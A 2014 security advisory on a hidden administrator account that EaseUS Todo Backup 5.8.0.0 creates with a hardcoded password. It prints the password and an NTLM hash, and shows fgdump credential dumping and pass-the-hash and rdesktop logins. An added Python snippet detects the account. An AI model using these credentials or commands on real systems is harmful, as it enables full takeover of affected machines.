EaseUS Todo Backup 5.8.0.0 Hardcoded Password

20 Mar 2014. Reported by AkaStep. Source: packetstorm (packetstormsecurity.com)

EaseUS Todo Backup 5.8.0.0 hardcoded admin password (potential backdoor). Impact: data compromise or control.

Vulnerable Software:   
========================================  
EaseUS Todo Backup 5.8.0.0 (build 20130321)  
  
http://oi62.tinypic.com/108i4ut.jpg  
========================================  
Vuln: Hardcoded administrative password / potential backdoor.  
========================================  
Impact:  
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes.   
========================================  
About software:  
  
Designed for small and medium-sized businesses.  
Simplify backup & recovery management to minimize server downtime and ensure business continuity  
========================================  
Vuln details:  
  
EaseUS Todo Backup 5.8.0.0 (build 20130321)   
(other versions may also be affected, but were not tested)  
  
When installed on a machine, the product silently creates a hidden local administrative account, protected only by a hardcoded (and now broken/known) password.  
  
This is not only a local concern: the account can be abused by remote attackers as well.  
Using this administrative account, a remote or local attacker can completely compromise the target machine.  
  
  
  
  
Here are a few proof-of-concept demonstrations:  
  
  
*Before installation ("net user" command on target machine)*  
  
C:\Users\Administrator>NET USER  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator Guest  
The command completed successfully.  
  
  
*After installation completes: (Notice: we've got a new local administrative account, added silently!)*  
  
C:\Users\Administrator>NET USER  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator ETB User Guest  
The command completed successfully.  
  
  
  
C:\Users\Administrator>control userpasswords2  
  
C:\Users\Administrator>cd Desktop  
  
C:\Users\Administrator\Desktop>fgdump.exe  
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net  
Written to make j0m0kun's life just a bit easier  
Copyright(C) 2008 fizzgig and foofus.net  
fgdump comes with ABSOLUTELY NO WARRANTY!  
This is free software, and you are welcome to redistribute it  
under certain conditions; see the COPYING and README files for  
more information.  
  
No parameters specified, doing a local dump. Specify -? if you are looking for help.  
--- Session ID: 2014-03-22-05-13-53 ---  
Starting dump on 127.0.0.1  
  
** Beginning local dump **  
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)  
Passwords dumped successfully  
Cache dumped successfully  
  
-----Summary-----  
  
Failed servers:  
NONE  
  
Successful servers:  
127.0.0.1  
  
Total failed: 0  
Total successful: 1  
  
  
  
  
C:\Users\Administrator\Desktop>net user  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator ETB User Guest  
The command completed successfully.  
  
  
C:\Users\Administrator\Desktop>net user "ETB User"  
User name ETB User  
Full Name ETB User  
Comment For EaseUS Todo Backup Central Management Cons  
User's comment  
Country/region code 000 (System Default)  
Account active Yes  
Account expires Never  
  
Password last set 3/21/2014 10:12:52 PM  
Password expires Never  
Password changeable 3/21/2014 10:12:52 PM  
Password required Yes  
User may change password Yes  
  
Workstations allowed All  
Logon script  
User profile  
Home directory  
Last logon Never  
  
Logon hours allowed All  
  
Local Group Memberships *Administrators  
Global Group memberships *None  
The command completed successfully.  
  
  
C:\Users\Administrator\Desktop>  
  
  
  
C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump  
---------- SNIP ----------------  
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:  
---------- SNIP ----------------  
  
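As an added example (not part of the advisory), the check above done programmatically: diff the local account list from a bare `net user` before and after an install, then parse `net user "<name>"` for the traits the session shows (Administrators membership, non-expiring password, vendor comment). The sample output is constructed from the advisory's session with the fixed-width column spacing restored; the function names are this example's own.

```python
import re
# Constructed sample input modelled on the advisory's "net user" session; the column
# spacing (2+ spaces) that the advisory's copy collapsed is restored here.
NET_USER_BEFORE = """
---------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.
"""
NET_USER_AFTER = NET_USER_BEFORE.replace(
    "Administrator            Guest", "Administrator            ETB User                 Guest")
# Constructed from the advisory's 'net user "ETB User"' output (subset of fields).
ETB_USER_DETAILS = """
User name                    ETB User
Comment                      For EaseUS Todo Backup Central Management Cons
Password expires             Never
Last logon                   Never
Local Group Memberships      *Administrators
The command completed successfully.
"""
def list_accounts(net_user_output):
    """Account names printed by a bare 'net user' call (a name may contain one space)."""
    accounts = set()
    for line in net_user_output.splitlines():
        if not line.strip() or line.startswith(("User accounts", "---", "The command")):
            continue  # header, dashed rule and trailer carry no names
        accounts.update(n for n in re.split(r"\s{2,}", line.strip()) if n)
    return accounts

def new_accounts(before, after):
    """Accounts present after the install that were not there before."""
    return list_accounts(after) - list_accounts(before)

def parse_details(net_user_name_output):
    """Parse 'net user <name>' into {field: value}; 2+ spaces separate the columns."""
    details = {}
    for line in net_user_name_output.splitlines():
        m = re.match(r"^(\S.*?)\s{2,}(.+)$", line)
        if m:
            details[m.group(1)] = m.group(2).strip()
    return details

def assess(details):
    """Flag the traits that make a vendor-created local account a backdoor risk."""
    checks = [
        ("Local Group Memberships", lambda v: "Administrators" in v, "member of local Administrators"),
        ("Password expires", lambda v: v == "Never", "password never expires"),
        ("Last logon", lambda v: v == "Never", "never logged on (service-style account)"),
        ("Comment", lambda v: "EaseUS" in v, "vendor-created account (EaseUS comment)"),
    ]
    return [msg for field, ok, msg in checks if ok(details.get(field, ""))]
```

Where such an account turns up, disabling it (`net user "ETB User" /active:no`) or setting it a unique password removes the shared credential every installation has in common.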
  
This hardcoded administrative password has already leaked into the wild:  
  
Pass: ~1EaseUs@AcsT  
  
http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6  
  
  
  
  
Logging on to this account:  
  
  
Microsoft Windows [Version 6.3.9600]  
(c) 2013 Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
win-ce1quvokt1h\etb user  
  
C:\Windows\system32>whoami /all  
  
USER INFORMATION  
----------------  
  
User Name SID  
======================== =============================================  
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001  
  
  
GROUP INFORMATION  
-----------------  
  
Group Name Type SID Attributes  
============================================================= ================ ============ ==================================================  
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only  
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only  
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group  
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group  
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group  
Mandatory Label\Medium Mandatory Level Label S-1-16-8192  
  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State  
============================= ==================================== ========  
SeShutdownPrivilege Shut down the system Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled  
SeUndockPrivilege Remove computer from docking station Disabled  
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
SeTimeZonePrivilege Change the time zone Disabled  
  
  
C:\Windows\system32>exit  
  
  
Testing the lovely Pass-the-Hash technique:  
The result is successful against Server 2012 R2  
  
  
  
[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103  
WARNING: Using deprecated command-line interface!  
-p ****** -> /p:******  
-u ETB User -> /u:ETB User  
192.168.1.103 -> /v:192.168.1.103  
connected to 192.168.1.103:3389  
Closed from X11  
  
PIC 1:  
http://oi58.tinypic.com/2z8b7t4.jpg  
  
  
  
  
  
  
Or using the valid, hardcoded and now publicly known credentials:  
  
[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103  
Autoselected keyboard map en-us  
Connection established using SSL.  
WARNING: Remote desktop does not support colour depth 24; falling back to 16  
  
  
  
PIC 2:  
  
http://oi60.tinypic.com/2j459pk.jpg  
  
  
  
  
  
===================== WITH LOVE FROM AZERBAIJAN ========================  
  
  
Special respects to CAMOUFL4G3 && ottoman38 and to all   
Azerbaijan Black hatz, Aa team && to all Turkish hackers.  
  
/AkaStep  